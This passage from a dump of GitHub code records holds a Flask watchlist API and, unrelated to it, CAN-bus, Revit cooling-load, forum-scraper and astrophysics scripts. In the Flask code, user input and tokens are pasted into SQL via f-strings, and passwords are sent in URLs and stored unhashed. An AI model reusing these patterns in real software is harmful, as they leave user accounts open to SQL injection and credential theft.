request.json['tipo']\n id_api = request.json['id_api']\n id_usuario = get_jwt_identity()\n sql = f\"INSERT INTO filmes (titulo, imagem, nota, tipo, id_api, id_usuario) SELECT %s, %s, %s, %s, %s, %s WHERE NOT EXISTS (SELECT 1 FROM filmes WHERE titulo = %s AND id_usuario = %s)\"\n values = (titulo, imagem, nota, tipo, id_api, id_usuario, titulo, id_usuario)\n con.queryExecute(sql, values) \n return jsonify({'status': 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/removerFilme\", methods = ['POST'])\n @jwt_required()\n def removerFilme():\n try:\n titulo = request.json['titulo']\n id_usuario = get_jwt_identity()\n sql = f\"DELETE FROM filmes WHERE id_usuario = '{id_usuario}' AND titulo = '{titulo}'\"\n con.queryExecute(sql, values=None) \n return jsonify({'status' : 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/series\", methods =['GET', 'POST'])\n @jwt_required()\n def consultarSeries():\n try: \n if(request.method == 'GET'):\n id = get_jwt_identity()\n sql = f\"SELECT * FROM series WHERE id_usuario = '{id}'\" \n results = con.querySelect(sql)\n return results\n elif(request.method == 'POST'):\n titulo = request.json['titulo']\n id_usuario = get_jwt_identity()\n sql = f\"SELECT * FROM series WHERE titulo = '{titulo}' AND id_usuario = '{id_usuario}'\" \n resposta = con.querySelectOne(sql)\n if(resposta is None):\n return jsonify({'status' : 'fail'})\n else:\n return jsonify({'status' : 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/inserirSerie\", methods =['POST'])\n @jwt_required()\n def inserirSerie():\n try:\n titulo = request.json['titulo']\n imagem = request.json['imagem']\n nota = request.json['nota']\n tipo = request.json['tipo']\n id_api = request.json['id_api']\n id_usuario = get_jwt_identity() \n sql = f\"INSERT INTO series (titulo, imagem, nota, tipo, id_api, id_usuario) SELECT %s, %s, %s, %s, %s, %s WHERE NOT EXISTS (SELECT 1 FROM series WHERE titulo = %s AND id_usuario = %s)\"\n values = (titulo, imagem, nota, tipo, id_api, id_usuario, titulo, id_usuario)\n con.queryExecute(sql, values) \n return jsonify({'status': 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/removerSerie\", methods = ['POST'])\n @jwt_required()\n def removerSerie():\n try:\n titulo = request.json['titulo']\n id_usuario = get_jwt_identity()\n sql = f\"DELETE FROM series WHERE id_usuario = '{id_usuario}' AND titulo = '{titulo}'\"\n con.queryExecute(sql, values=None) \n return jsonify({'status' : 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/listaDesejo\", methods =['GET'])\n @jwt_required()\n def consultarListaDesejo():\n try:\n id = get_jwt_identity()\n sql = f\"SELECT * FROM listadesejo WHERE id_usuario = '{id}'\"\n results = con.querySelect(sql) \n return results\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/inserirListaDesejo\", methods =['POST'])\n @jwt_required()\n def inserirListaDesejo():\n try:\n titulo = request.json['titulo']\n imagem = request.json['imagem']\n nota = request.json['nota']\n tipo = request.json['tipo']\n id_api = request.json['id_api']\n id_usuario = get_jwt_identity()\n sql = f\"INSERT INTO listadesejo (titulo, imagem, nota, tipo, id_api, id_usuario) SELECT %s, %s, %s, %s, %s, %s WHERE NOT EXISTS (SELECT 1 FROM listadesejo WHERE titulo = %s AND id_usuario = %s)\"\n values = (titulo, imagem, nota, tipo, id_api, id_usuario, titulo, id_usuario)\n con.queryExecute(sql, values) \n return jsonify({'status': 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n @app.route(\"/removerListaDesejo\", methods =['POST'])\n @jwt_required()\n def removerListaDesejo():\n try:\n titulo = request.json['titulo']\n id_usuario = get_jwt_identity() \n sql = f\"DELETE FROM listadesejo WHERE titulo = '{titulo}' AND id_usuario = '{id_usuario}';\"\n con.queryExecute(sql, values=None) \n return jsonify({'status': 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error404')\n \n \n @app.route(\"/confirmarEmail/\", methods =['GET']) \n def confirmarEmail(token):\n try: \n sql = f\"SELECT * FROM verificacao WHERE token = '{token}' AND isValid = 'false';\" \n resposta = con.querySelectOne(sql)\n if(resposta is None):\n return redirect(f'{recUrl}/finalizado')\n else: \n sql = f\"UPDATE verificacao SET isValid=true WHERE token = %s\"\n values = (token,)\n con.queryExecute(sql, values)\n sql = f'''INSERT INTO usuarios (nome, email, senha) SELECT %s, %s, %s WHERE NOT EXISTS (SELECT 1 FROM usuarios WHERE email = %s);'''\n values = (resposta[1], resposta[2], resposta[3], resposta[2])\n con.queryExecute(sql, values)\n return redirect(f'{recUrl}/finalizado?q={token}')\n except Exception as e: \n return redirect(f'{recUrl}/token-expired')\n \n @app.route(\"/enviarEmail\", methods =['GET'])\n def enviarEmail():\n try:\n email = request.args.get('email')\n nome = request.args.get('nome')\n senha = request.args.get('senha')\n app.config['JWT_ACCESS_TOKEN_EXPIRES'] = timedelta(minutes=15)\n tokenEmail = create_access_token(identity=email)\n sql = f\"INSERT INTO verificacao (nome, email, senha, token) VALUES (%s, %s, %s, %s);\"\n values = (nome, email, senha, tokenEmail)\n con.queryExecute(sql, values)\n msg = Message('Confirmação de Cadastro', sender='project-rec@outlook.com', recipients=[f'{email}']) \n url = f'{apiUrl}/confirmarEmail/{tokenEmail}' \n msg.html = f''' \n

Confirme seu cadastro através do link abaixo:

\n \n {url}\n '''\n mail.send(msg) \n return jsonify({'status': 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error')\n \n @app.route('/recuperarSenha', methods =['POST'])\n def recuperarSenha():\n try:\n email = request.json['email']\n sql = f\"SELECT * FROM usuarios WHERE email = '{email}'\"\n resposta = con.querySelectOne(sql)\n if (resposta is None):\n return jsonify({'status' : 'fail'})\n else:\n app.config['JWT_ACCESS_TOKEN_EXPIRES'] = timedelta(minutes=15)\n tokenEmail = create_access_token(identity=email) \n msg = Message('Alteração de Senha', sender='project-rec@outlook.com', recipients=[f'{email}'])\n url = f'{apiUrl}/check-token/{tokenEmail}'\n msg.html = f''' \n

Altere sua senha através do link abaixo:

\n \n {url}\n '''\n mail.send(msg)\n return jsonify({'status' : 'sucess'})\n except Exception as e:\n return redirect(f'{recUrl}/error') \n \n @app.route('/check-token/', methods =['GET']) \n def checkToken(token):\n try:\n decoded_token = decode_token(token)\n if decoded_token['type'] == 'access':\n return redirect(f'{recUrl}/novaSenha?q={token}')\n else:\n return redirect(f'{recUrl}/erro404')\n except Exception as e: \n return redirect(f'{recUrl}/token-expired') \n \n @app.route('/novaSenha/', methods =['POST']) \n def alterarSenha(token): \n try: \n tokenConfirm = decode_token(token) \n email = tokenConfirm['sub']\n senha = request.json['senha']\n if verificaSenha(senha):\n senha = senha.encode('utf-8')\n salt = gensalt()\n senha = hashpw(senha, salt).decode('utf-8')\n sql = f\"UPDATE usuarios SET senha = %s WHERE email = %s\"\n values = (senha, email)\n con.queryExecute(sql, values)\n return jsonify({'status' : 'sucess', 'msg' : 'Senha alterada com sucesso!'})\n else:\n return jsonify({'status' : 'senhaFraca'})\n except Exception as e: \n return redirect(f'{recUrl}/token-expired') \n\n if __name__ == '__main__':\n app.run(debug=True)\n\nexcept(Error) as error:\n print(error)\n","repo_name":"jeffbcampos/api-rec","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":17642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10690050520","text":"from PCANBasic import *\r\nfrom ManualRead import *\r\n\r\nm_objPCANBasic = PCANBasic()\r\n\r\n\r\ndef GetDataString(data, msgtype):\r\n \"\"\"\r\n Gets the data of a CAN message as a string\r\n\r\n Parameters:\r\n data = Array of bytes containing the data to parse\r\n msgtype = Type flags of the message the data belong\r\n\r\n Returns:\r\n A string with hexadecimal formatted data bytes of a CAN message\r\n \"\"\"\r\n if (msgtype & PCAN_MESSAGE_RTR.value) == PCAN_MESSAGE_RTR.value:\r\n return \"Remote Request\"\r\n else:\r\n strTemp = b\"\"\r\n for x in data:\r\n strTemp += b'%.2X ' % x\r\n return str(strTemp).replace(\"'\", \"\", 2).replace(\"b\", \"\", 1)\r\n # return strTemp\r\n\r\n\r\ndef GetTimeString(time):\r\n \"\"\"\r\n Gets the string representation of the timestamp of a CAN message, in milliseconds\r\n\r\n Parameters:\r\n time = Timestamp in microseconds\r\n\r\n Returns:\r\n String representing the timestamp in milliseconds\r\n \"\"\"\r\n fTime = time / 1000\r\n return '%.1f' % fTime\r\n\r\n\r\ndef ProcessMessageCan(msg, itstimestamp):\r\n \"\"\"\r\n Processes a received CAN message\r\n \r\n Parameters:\r\n msg = The received PCAN-Basic CAN message\r\n itstimestamp = Timestamp of the message as TPCANTimestamp structure\r\n \"\"\"\r\n microsTimeStamp = itstimestamp.micros + 1000 * itstimestamp.millis + 0x100000000 * 1000 * itstimestamp.millis_overflow\r\n\r\n # print(\"Type: \" + GetTypeString(msg.MSGTYPE))\r\n # print(\"ID: \" + GetIdString(msg.ID, msg.MSGTYPE))\r\n # print(\"Length: \" + str(msg.LEN))\r\n read_time = GetTimeString(microsTimeStamp)\r\n read_data = GetDataString(msg.DATA, msg.MSGTYPE)\r\n\r\n return read_time, read_data\r\n\r\n\r\n'''\r\ndef ReadMessage(self):\r\n \"\"\"\r\n Function for reading CAN messages on normal CAN devices\r\n\r\n Returns:\r\n A TPCANStatus error code\r\n \"\"\"\r\n ## We execute the \"Read\" function of the PCANBasic\r\n stsResult = self.m_objPCANBasic.Read(self.PcanHandle)\r\n\r\n if stsResult[0] == PCAN_ERROR_OK:\r\n ## We show the received message\r\n self.ProcessMessageCan(stsResult[1], stsResult[2])\r\n\r\n return stsResult[0]\r\n'''","repo_name":"IshaanSharmaa/PCAN-USB-Monitoring-Recording-for-Battery-Management-System","sub_path":"ProcessMessageCanFunc.py","file_name":"ProcessMessageCanFunc.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27266449264","text":"# coding: utf8\nfrom rpw import revit, DB\nfrom pyrevit import script, forms\nfrom IGF_log import getlog\nfrom IGF_lib import get_value\nfrom IGF_forms import Texteingeben\n\n\n__title__ = \"2.20 Kühllast & Kühlleistung MEP Räume\"\n__doc__ = \"\"\"berechnet Kühllast und Kühlleistung von MEP Räume\n\ninput Parameter:\n--------------------\nIGF_RLT_ZuluftminRaum: Zuluftmengen\n\nIGF_RLT_ZuluftTemperatur: Zulufttemperatur\n\nLIN_BA_OVERFLOW_SUPPLY_AIR_TEMPERATURE: Zulufttemperatur falls IGF_RLT_ZuluftTemperatur nicht eingegeben wird\n\nLIN_BA_DESIGN_COOLING_TEMPERATURE: Raumtemperatur\n\nIGF_K_KühllastLaborRaum: Kühllast Labor Raum\n\nIGF_S_KühllastLaborPWK: Kühllast für Laboreinrichtung über PKW\n\nLIN_BA_CALCULATED_COOLING_LOAD: Kühllast Gebäude\n\nIGF_K_DeS_Leistung: Kühlleistung DeS\n\nIGF_K_ULK_Leistung: Kühlleistung ULK\n\nIGF_K_KA_Leistung: sonstige Kühlleistung\n--------------------\n\noutput Parameter:\n--------------------\nIGF_RLT_ZuluftKühlleistung: Kühlleistung Zuluft, Zuluftfaktor * (Vol_zu * 1000 * 1.2 * 1.006 * (Temp_Raum - Temp_Zu) / 3600)\n\nIGF_K_KühlleistungRaum: Summe von Zuluft- & DeS- & ULK- & Kältekühlleistung\n\nIGF_K_KühllastGesamt: Summe von Kühllast Gebäude und Kühllast Labor Raum\n\nIGF_K_KühlleistungBilanz: gesamte Kühlleistung - gesamte Kühllast\n\nIGF_K_KühlBilanzProzent: gesamte Kühlleistung / gesamte Kühllast\n--------------------\n\n[Version: 1.2]\n[2021.11.18]\n\"\"\"\n__author__ = \"Menghui Zhang\"\n\nlogger = script.get_logger()\noutput = script.get_output()\n\ntry:\n getlog(__title__)\nexcept:\n pass\n\nuidoc = revit.uidoc\ndoc = revit.doc\nname = doc.ProjectInformation.Name\nnumber = doc.ProjectInformation.Number\nactive_view = uidoc.ActiveView\n\n# MEP Räume aus aktueller Ansicht\nspaces_collector = DB.FilteredElementCollector(doc).OfCategory(DB.BuiltInCategory.OST_MEPSpaces).WhereElementIsNotElementType()\nspaces = spaces_collector.ToElementIds()\nspaces_collector.Dispose()\n\nlogger.info(\"{} MEP Räume ausgewählt\".format(len(spaces)))\n\nif not spaces:\n logger.error(\"Keine MEP Räume in aktueller Projekt gefunden\")\n script.exit()\n\nfaktor = Texteingeben(text='0.8',label='Faktor der Zuluftleistung')\nfaktor.Title = __title__\ntry:\n faktor.ShowDialog()\nexcept Exception as e:\n logger.error(e)\n script.exit()\n\nZuluftfaktor = faktor.text.Text\nif Zuluftfaktor.find(','):\n Zuluftfaktor.replace(',','.')\ntry:\n if Zuluftfaktor == '0':\n Zuluftfaktor = 0.8\n Zuluftfaktor = float(Zuluftfaktor)\n \n\nexcept:\n logger.error('Falsche Faktor')\n script.exit()\n\nclass MEPRaum:\n def __init__(self, element_id):\n self.element_id = element_id\n self.element = doc.GetElement(self.element_id)\n self.name = self.get_parameter('Name')\n self.nummer = self.get_parameter('Nummer')\n self.Vol_zu = self.get_parameter('IGF_RLT_ZuluftminRaum')\n self.T_raum = self.get_parameter('LIN_BA_DESIGN_COOLING_TEMPERATURE')\n self.Kuehllast_Labor_Raum = self.get_parameter('IGF_K_KühllastLaborRaum')\n self.Kuehllast_Labor_PWK = self.get_parameter('IGF_S_KühllastLaborPWK')\n self.Kuehllast_Gebaeude = self.get_parameter('LIN_BA_CALCULATED_COOLING_LOAD')\n self.KL_DeS = self.get_parameter('IGF_K_DeS_Leistung')\n self.KL_ULK = self.get_parameter('IGF_K_ULK_Leistung')\n self.KL_KA = self.get_parameter('IGF_K_KA_Leistung')\n self.raumtyp = self.element.LookupParameter('Bedingungstyp').AsValueString()\n\n try:\n self.T_zu = self.get_parameter('IGF_RLT_ZuluftTemperatur')\n if self.T_zu == '0' or self.T_zu == None:\n try:\n self.T_zu = self.get_parameter('LIN_BA_OVERFLOW_SUPPLY_AIR_TEMPERATURE')\n except:\n self.T_zu = -273.15\n logger.error('kein Zulufttemperatur eingegeben')\n else:\n pass\n except:\n try:\n self.T_zu = self.get_parameter('LIN_BA_OVERFLOW_SUPPLY_AIR_TEMPERATURE')\n except:\n self.T_zu = -273.15\n logger.error('kein Zulufttemperatur eingegeben')\n\n if self.raumtyp in ['Gekühlt','Beheizt und gekühlt']:\n self.P_zu = self.zuluft_kuelleistung_berechnen()\n else:\n self.P_zu = 0\n\n self.Kuehllast_gesamt = self.KuehllastGesamt_Berechnen()\n self.KL_gesamt = self.KL_gesamt_berechnen()\n self.Prozent = self.Prozent_Berechnen()\n self.KL_Bilanz = self.KL_Bilanz_Berechnen()\n\n\n def Werte_Pruefen(self,wert):\n if not wert:\n wert = 0\n return wert\n\n def get_parameter(self, param_name):\n param = self.element.LookupParameter(param_name)\n if not param:\n logger.error(\n \"Parameter {} konnte nicht gefunden werden\".format(param_name))\n return ''\n return get_value(param)\n\n def zuluft_kuelleistung_berechnen(self):\n Kuelhlleistung = 0\n if self.Vol_zu and self.T_zu > -273.15 and self.T_raum > -273.15:\n Kuelhlleistung = Zuluftfaktor * (self.Vol_zu * 1000 * 1.2 * 1.006 * (self.T_raum - self.T_zu) / 3600)\n return round(Kuelhlleistung, 2)\n \n def KL_gesamt_berechnen(self):\n Kuelhlleistung = 0\n self.KL_DeS = self.Werte_Pruefen(self.KL_DeS)\n self.KL_ULK = self.Werte_Pruefen(self.KL_ULK)\n self.KL_KA = self.Werte_Pruefen(self.KL_KA)\n self.P_zu = self.Werte_Pruefen(self.P_zu)\n\n Kuelhlleistung = self.KL_DeS + self.KL_ULK + self.KL_KA + self.P_zu\n\n return round(Kuelhlleistung, 2)\n\n def KuehllastGesamt_Berechnen(self):\n KuehllastGesamt = 0\n\n try:\n KuehllastGesamt = self.Kuehllast_Gebaeude + self.Kuehllast_Labor_Raum\n except:\n try:\n KuehllastGesamt = self.Kuehllast_Gebaeude + 0.0\n except:\n try:\n KuehllastGesamt = self.Kuehllast_Labor_Raum + 0.0\n except:\n KuehllastGesamt = 0.0\n\n KuehllastGesamt = self.Kuehllast_Gebaeude + self.Kuehllast_Labor_Raum\n\n return KuehllastGesamt\n\n def KL_Bilanz_Berechnen(self):\n\n KL_Bilanz = 0\n KL_Bilanz = float(self.KL_gesamt) - self.Kuehllast_gesamt\n \n return KL_Bilanz\n \n def Prozent_Berechnen(self):\n prozent = 0\n if not self.Kuehllast_gesamt:\n return 0\n\n prozent = float(self.KL_gesamt) / self.Kuehllast_gesamt\n return round(prozent,3)\n \n\n\n def werte_schreiben(self):\n \"\"\"Schreibt die berechneten Werte zurück in das Modell.\"\"\"\n def wert_schreiben(param_name, wert):\n if not wert is None:\n # logger.info(\n # \"{} - {} Werte schreiben ({})\".format(self.nummer, param_name, wert))\n self.element.LookupParameter(\n param_name).SetValueString(str(wert))\n\n wert_schreiben(\"IGF_RLT_ZuluftKühlleistung\", self.P_zu)\n wert_schreiben(\"IGF_K_KühllastGesamt\", self.Kuehllast_gesamt)\n wert_schreiben(\"IGF_K_KühlleistungBilanz\", self.KL_Bilanz)\n wert_schreiben(\"IGF_K_KühlleistungRaum\", self.KL_gesamt)\n self.element.LookupParameter('IGF_K_KühlBilanzProzent').Set(self.Prozent)\n\n\n\nmepraum_liste = []\nwith forms.ProgressBar(title='{value}/{max_value} MEP-Räume',cancellable=True, step=10) as pb:\n for n, space_id in enumerate(spaces):\n if pb.cancelled:\n script.exit()\n\n pb.update_progress(n + 1, len(spaces))\n mepraum = MEPRaum(space_id)\n\n mepraum_liste.append(mepraum)\n\n\n# Werte zuückschreiben + Abfrage\nif forms.alert('Berechnete Werte in Modell schreiben?', ok=False, yes=True, no=True):\n with forms.ProgressBar(title='{value}/{max_value} Werte schreiben',cancellable=True, step=10) as pb2:\n t = DB.Transaction(doc)\n t.Start('Werte schreiben')\n\n for n,mepraum in enumerate(mepraum_liste):\n if pb2.cancelled:\n t.RollBack()\n script.exit()\n pb2.update_progress(n+1, len(mepraum_liste))\n mepraum.werte_schreiben()\n t.Commit()","repo_name":"MenghuiZhang/pyIGF","sub_path":"pyIGF.tab/Heizen & Kühlen.panel/s1.stack/Kühlen.pulldown/2.20 Kuehlast&Kuehlleistung.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15334706780","text":"#-*- coding:utf-8 -*-\n#http://tieba.baidu.com/f?kw=python&fr=ala0&tpl=5&traceid=\n#http://tieba.baidu.com/f?kw=python&ie=utf-8&pn=50\n#http://tieba.baidu.com/f?kw=python&ie=utf-8&pn=100\n#http://tieba.baidu.com/f?kw=python&ie=utf-8&pn=150\n#Mozilla/5.0 (Windows NT 10.0; …) Gecko/20100101 Firefox/66.0\nimport urllib\nfrom urllib import request\n#import urllib.request\nimport time\n\nheader={\n \"User-Agent\":\"Mozilla/5.0 (Linux; U; An\\\ndroid 8.1.0; zh-cn; BLA-AL00 Build/HUAW\\\nEIBLA-AL00) AppleWebKit/537.36 (KHTML, l\\\nike Gecko) Version/4.0 Chrome/57.0.2987.13\\\n2 MQQBrowser/8.9 Mobile Safari/537.36\"\n}\ndef loadpage(fullurl,filename):\n print(\"正在下载:\",filename)\n req=urllib.request.Request(fullurl,headers=header)\n resp=urllib.request.urlopen(req).read()\n return resp\n\ndef writepage(html,filename):\n print(\"正在保存:\",filename)\n with open(filename,\"wb\") as f:\n f.write(html)\n print(\"--------\")\ndef tiebaSpider(url,begin,end):\n for page in range(begin,end+1):\n pn=(page-1)*50\n fullurl=url+\"&pn=\"+str(pn)\n filename = \"D:\\第\" + str(page) + \"页.html\"\n html=loadpage(fullurl,filename)\n writepage(html,filename)\n\n #print(\"谢谢使用\")\n\n\nif __name__ == '__main__':\n kw=input(\"请输入贴吧名:\")\n begin=int(input(\"请输入你要下载的起始页:\"))\n end=int(input(\"请输入你要下载的末页:\"))\n url=\"http://tieba.baidu.com/f?\"\n key=urllib.parse.urlencode({\"kw\":kw})\n url=url+key\n tiebaSpider(url,begin,end)\n #tiebaSpider(url1,begin,end)\n time.sleep(5)\n\n\n#for i in range(1,4):\n#print(\"http://tieba.baidu.com/f?kw=python&ie=utf-8&pn=\"+str((i-1)*50))\n","repo_name":"LMlmptm/python","sub_path":"我要自学网/teba1.py","file_name":"teba1.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39054397793","text":"import numpy as np\nfrom numba import jit, njit, float64, int32, prange\nfrom photutils import CircularAperture, aperture_photometry\nfrom scipy.interpolate import interp1d\n\nimport SynthObs\nfrom SynthObs.SED import models\nimport FLARE\nimport FLARE.filters\nfrom FLARE.photom import lum_to_M, M_to_lum\n\n@njit(float64[:](float64[:,:], float64[:,:], float64[:], float64[:], float64[:], float64[:], int32), parallel=True, nogil=True)\ndef get_Z_LOS(s_cood, g_cood, g_mass, g_Z, g_sml, lkernel, kbins):\n\n \"\"\"\n\n Compute the los metal surface density (in Msun/Mpc^2) for star particles inside the galaxy taking\n the z-axis as the los.\n Args:\n s_cood (3d array): stellar particle coordinates\n g_cood (3d array): gas particle coordinates\n g_mass (1d array): gas particle mass\n g_Z (1d array): gas particle metallicity\n g_sml (1d array): gas particle smoothing length\n\n \"\"\"\n n = len(s_cood)\n Z_los_SD = np.zeros(n)\n #Fixing the observer direction as z-axis. Use make_faceon() for changing the\n #particle orientation to face-on\n xdir, ydir, zdir = 0, 1, 2\n for ii in prange(n):\n\n thisspos = s_cood[ii]\n ok = np.where(g_cood[:,zdir] > thisspos[zdir])[0]\n thisgpos = g_cood[ok]\n thisgsml = g_sml[ok]\n thisgZ = g_Z[ok]\n thisgmass = g_mass[ok]\n x = thisgpos[:,xdir] - thisspos[xdir]\n y = thisgpos[:,ydir] - thisspos[ydir]\n\n b = np.sqrt(x*x + y*y)\n boverh = b/thisgsml\n\n ok = np.where(boverh <= 1.)[0]\n kernel_vals = np.array([lkernel[int(kbins*ll)] for ll in boverh[ok]])\n\n Z_los_SD[ii] = np.sum((thisgmass[ok]*thisgZ[ok]/(thisgsml[ok]*thisgsml[ok]))*kernel_vals) #in units of Msun/Mpc^2\n\n\n return Z_los_SD\n\n\ndef get_spherical_from_cartesian(coords):\n\n x, y, z = coords\n\n xy = x**2 + y**2\n r = np.sqrt(xy + z**2)\n theta = np.arctan2(np.sqrt(xy), z) # for elevation angle defined from Z-axis down\n phi = np.arctan2(y, x)\n\n return r, theta, phi\n\n\ndef get_cartesian_from_spherical(t_angles):\n\n x = np.sin(t_angles[0])*np.cos(t_angles[1])\n y = np.sin(t_angles[0])*np.sin(t_angles[1])\n z = np.cos(t_angles[0])\n\n return np.array([x, y, z])\n\ndef get_rotation_matrix(i_v, unit=None):\n # This solution is from ---\n # https://stackoverflow.com/questions/43507491/imprecision-with-rotation-matrix-to-align-a-vector-to-an-axis\n\n # This uses the Rodrigues' rotation formula for the re-projection\n\n # From http://www.j3d.org/matrix_faq/matrfaq_latest.html#Q38\n if unit is None:\n unit = [0.0, 0.0, 1.0]\n # Normalize vector length\n i_v /= np.linalg.norm(i_v)\n\n # Get axis\n uvw = np.cross(i_v, unit)\n\n # compute trig values - no need to go through arccos and back\n rcos = np.dot(i_v, unit)\n rsin = np.linalg.norm(uvw)\n\n #normalize and unpack axis\n if not np.isclose(rsin, 0):\n uvw /= rsin\n u, v, w = uvw\n\n # Compute rotation matrix - re-expressed to show structure\n return (\n rcos * np.eye(3) +\n rsin * np.array([\n [ 0, -w, v],\n [ w, 0, -u],\n [-v, u, 0]\n ]) +\n (1.0 - rcos) * uvw[:,None] * uvw[None,:]\n )\n\n\n\ndef ang_mom_vector(this_mass, this_cood, this_vel):\n\n #Get the angular momentum unit vector\n L_tot = np.array([this_mass]).T * np.cross(this_cood, this_vel)\n L_tot_mag = np.sqrt(np.sum(np.nansum(L_tot, axis = 0)**2))\n L_unit = np.sum(L_tot, axis = 0)/L_tot_mag\n\n return L_unit\n\n\ndef kappa(this_smass, this_scoord, this_svel):\n\n\n L_tot = np.array([this_smass]).T*np.cross(this_scoord, this_svel)\n L_tot_mag = np.sqrt(np.sum(np.nansum(L_tot, axis = 0)**2))\n\n L_unit = np.sum(L_tot, axis = 0)/L_tot_mag\n\n R_z = np.cross(this_scoord,L_unit)\n absR_z = np.sqrt(np.sum(R_z**2, axis = 1))\n mR = this_smass*absR_z\n K = np.nansum(this_smass*np.sum(this_svel**2, axis = 1))\n\n L = np.sum(L_tot*L_unit, axis = 1)\n L_co = np.copy(L)\n co = np.where(L_co > 0.)\n L_co = L_co[co]\n\n L_mR = (L/mR)**2\n L_co_mR = (L_co/mR[co])**2\n Krot = np.nansum(this_smass*L_mR)/K\n\n\n Kco = np.nansum(this_smass[co]*L_co_mR)/K\n\n\n return Kco, Krot\n\n\ndef lum(MetSurfaceDensities, Masses, Ages, Metallicities, DTM, kappa=0.0795, BC_fac=1.0, IMF = 'Chabrier_300', filters = ['FAKE.TH.FUV'], Type = 'Total', log10t_BC = 7., extinction = 'default'):\n\n model = models.define_model(F'BPASSv2.2.1.binary/{IMF}') # DEFINE SED GRID -\n if extinction == 'default':\n model.dust_ISM = ('simple', {'slope': -1.}) #Define dust curve for ISM\n model.dust_BC = ('simple', {'slope': -1.}) #Define dust curve for birth cloud component\n elif extinction == 'Calzetti':\n model.dust_ISM = ('Starburst_Calzetti2000', {''})\n model.dust_BC = ('Starburst_Calzetti2000', {''})\n elif extinction == 'SMC':\n model.dust_ISM = ('SMC_Pei92', {''})\n model.dust_BC = ('SMC_Pei92', {''})\n elif extinction == 'MW':\n model.dust_ISM = ('MW_Pei92', {''})\n model.dust_BC = ('MW_Pei92', {''})\n elif extinction == 'N18':\n model.dust_ISM = ('MW_N18', {''})\n model.dust_BC = ('MW_N18', {''})\n else: ValueError(\"Extinction type not recognised\")\n\n # --- create rest-frame luminosities\n F = FLARE.filters.add_filters(filters, new_lam = model.lam)\n model.create_Lnu_grid(F) # --- create new L grid for each filter. In units of erg/s/Hz\n\n DustSurfaceDensities = DTM * MetSurfaceDensities\n\n if Type == 'Total':\n tauVs_ISM = kappa * DustSurfaceDensities # --- calculate V-band (550nm) optical depth for each star particle\n tauVs_BC = BC_fac * (Metallicities/0.01)\n fesc = 0.0\n\n elif Type == 'Pure-stellar':\n tauVs_ISM = np.zeros(len(Masses))\n tauVs_BC = np.zeros(len(Masses))\n fesc = 1.0\n\n elif Type == 'Intrinsic':\n tauVs_ISM = np.zeros(len(Masses))\n tauVs_BC = np.zeros(len(Masses))\n fesc = 0.0\n\n elif Type == 'Only-BC':\n tauVs_ISM = np.zeros(len(Masses))\n tauVs_BC = BC_fac * (Metallicities/0.01)\n fesc = 0.0\n\n else:\n ValueError(F\"Undefined Type {Type}\")\n\n Lnu = models.generate_Lnu(model, Masses, Ages, Metallicities, tauVs_ISM, tauVs_BC, F, fesc = fesc, log10t_BC = log10t_BC) # --- calculate rest-frame Luminosity. In units of erg/s/Hz\n Lums = list(Lnu.values())\n\n return Lums\n\n\ndef lum_from_stars(MetSurfaceDensities, Masses, Ages, Metallicities, DTM, kappa=0.0795, BC_fac=1.0, IMF = 'Chabrier_300', filters = ['FAKE.TH.FUV'], Type = 'Total', log10t_BC = 7., extinction = 'default'):\n\n model = models.define_model(F'BPASSv2.2.1.binary/{IMF}') # DEFINE SED GRID -\n if extinction == 'default':\n model.dust_ISM = ('simple', {'slope': -1.}) #Define dust curve for ISM\n model.dust_BC = ('simple', {'slope': -1.}) #Define dust curve for birth cloud component\n elif extinction == 'Calzetti':\n model.dust_ISM = ('Starburst_Calzetti2000', {''})\n model.dust_BC = ('Starburst_Calzetti2000', {''})\n elif extinction == 'SMC':\n model.dust_ISM = ('SMC_Pei92', {''})\n model.dust_BC = ('SMC_Pei92', {''})\n elif extinction == 'MW':\n model.dust_ISM = ('MW_Pei92', {''})\n model.dust_BC = ('MW_Pei92', {''})\n elif extinction == 'N18':\n model.dust_ISM = ('MW_N18', {''})\n model.dust_BC = ('MW_N18', {''})\n else: ValueError(\"Extinction type not recognised\")\n\n # --- create rest-frame luminosities\n F = FLARE.filters.add_filters(filters, new_lam = model.lam)\n model.create_Lnu_grid(F) # --- create new L grid for each filter. In units of erg/s/Hz\n\n DustSurfaceDensities = DTM * MetSurfaceDensities\n\n if Type == 'Total':\n tauVs_ISM = kappa * DustSurfaceDensities # --- calculate V-band (550nm) optical depth for each star particle\n tauVs_BC = BC_fac * (Metallicities/0.01)\n fesc = 0.0\n\n elif Type == 'Pure-stellar':\n tauVs_ISM = np.zeros(len(Masses))\n tauVs_BC = np.zeros(len(Masses))\n fesc = 1.0\n\n elif Type == 'Intrinsic':\n tauVs_ISM = np.zeros(len(Masses))\n tauVs_BC = np.zeros(len(Masses))\n fesc = 0.0\n\n elif Type == 'Only-BC':\n tauVs_ISM = np.zeros(len(Masses))\n tauVs_BC = BC_fac * (Metallicities/0.01)\n fesc = 0.0\n\n else:\n ValueError(F\"Undefined Type {Type}\")\n\n Lnu = {f: models.generate_Lnu_array(model, Masses, Ages, Metallicities, tauVs_ISM, tauVs_BC, F, f, fesc = fesc) for f in filters} # --- calculate rest-frame Luminosity. In units of erg/s/Hz\n Lums = list(Lnu.values())\n\n return Lums\n\n\ndef calc_axes(coods):\n \"\"\"\n Args:\n coods - normed coordinates\n\n Returns:\n [a, b, c]:\n e_vectors:\n \"\"\"\n\n I 